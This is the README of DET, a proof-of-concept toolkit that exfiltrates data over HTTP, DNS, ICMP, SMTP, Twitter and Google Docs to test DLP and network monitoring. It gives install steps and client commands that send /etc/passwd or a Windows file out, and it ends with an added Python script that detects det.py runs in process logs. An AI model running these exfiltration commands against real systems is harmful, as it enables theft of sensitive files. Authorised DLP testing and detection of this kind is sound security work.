Data Exfiltration Toolkit (DET)
DET (extensible) Data Exfiltration Toolkit
DET (provided AS IS) is a proof of concept to perform data exfiltration using either a single channel or multiple channels at the same time. The idea was to create a generic toolkit into which any kind of protocol/service can be plugged, in order to test the configuration of implemented Network Monitoring and Data Leakage Prevention (DLP) solutions against different data exfiltration techniques.
DET supports multiple protocols, listed here:
- HTTP(S)
- ICMP
- DNS
- SMTP/IMAP (e.g. Gmail)
- Raw TCP
- PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
And other “services”:
- Google Docs (Unauthenticated)
- Twitter (Direct Messages)
Install
git clone https://github.com/sensepost/DET.git
cd DET
pip install -r requirements.txt --user
Configuration
In order to use DET, you will need to configure it and add your own settings (e.g. SMTP/IMAP, AES256 encryption passphrase and so on). A sample configuration file is provided: config-sample.json
Usage
Server-side:
To load every plugin:
python det.py -L -c ./config.json
To load only the Twitter and Gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns
Client-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only the Twitter and Gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
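For teams running these tests, the following added example (not part of DET or of the original page) scans process-creation logs for the det.py command lines shown above and reports the role, the plugins selected with -p/-e and the file passed with -f, so each run can be matched against the monitoring/DLP alerts it should have raised. The log format, host and user names and the sanctioned-user list are constructed assumptions; matching relies only on the script name and flags from the Usage section.

```python
import os
import shlex

# Flags as shown in the Usage section; each one takes a single value.
VALUE_FLAGS = {"-c": "config", "-p": "include", "-e": "exclude", "-f": "file"}

# Constructed process-creation log lines (hypothetical key=value format, cmd= last).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z host=srv01 user=dlptest cmd=python det.py -L -c ./config.json -e dns
2024-05-01T10:02:10Z host=ws07 user=dlptest cmd=python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
2024-05-01T10:03:44Z host=ws07 user=alice cmd=python manage.py runserver
2024-05-01T10:05:02Z host=ws09 user=bob cmd=python /tmp/DET/det.py -c ./config.json -f /etc/passwd
"""

def classify(cmdline):
    """Return a dict describing a det.py invocation, or None if it is not one."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes in the logged command
        return None
    pos = next((i for i, a in enumerate(argv) if os.path.basename(a) == "det.py"), None)
    if pos is None:
        return None
    run = {"role": "client", "config": None, "include": [], "exclude": [], "file": None}
    args = iter(argv[pos + 1:])
    for arg in args:
        if arg == "-L":         # -L appears only in the server-side commands
            run["role"] = "server"
        elif arg in VALUE_FLAGS:
            key, value = VALUE_FLAGS[arg], next(args, "")
            if key in ("include", "exclude"):
                run[key] = [v for v in value.split(",") if v]
            else:
                run[key] = value
    return run

def scan(log_text, sanctioned_users=("dlptest",)):
    """Return (host, user, run, sanctioned) for every det.py execution in the log."""
    hits = []
    for line in log_text.splitlines():
        head, sep, cmd = line.partition(" cmd=")
        run = classify(cmd) if sep else None
        if run:
            fields = dict(f.split("=", 1) for f in head.split()[1:])
            user = fields.get("user")
            hits.append((fields.get("host"), user, run, user in sanctioned_users))
    return hits

if __name__ == "__main__":
    for host, user, run, ok in scan(SAMPLE_LOG):
        print(host, user, run["role"], run["file"], "sanctioned" if ok else "REVIEW")
```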
Copyright (c) 2016 SensePost
Source: https://github.com/PaulSec/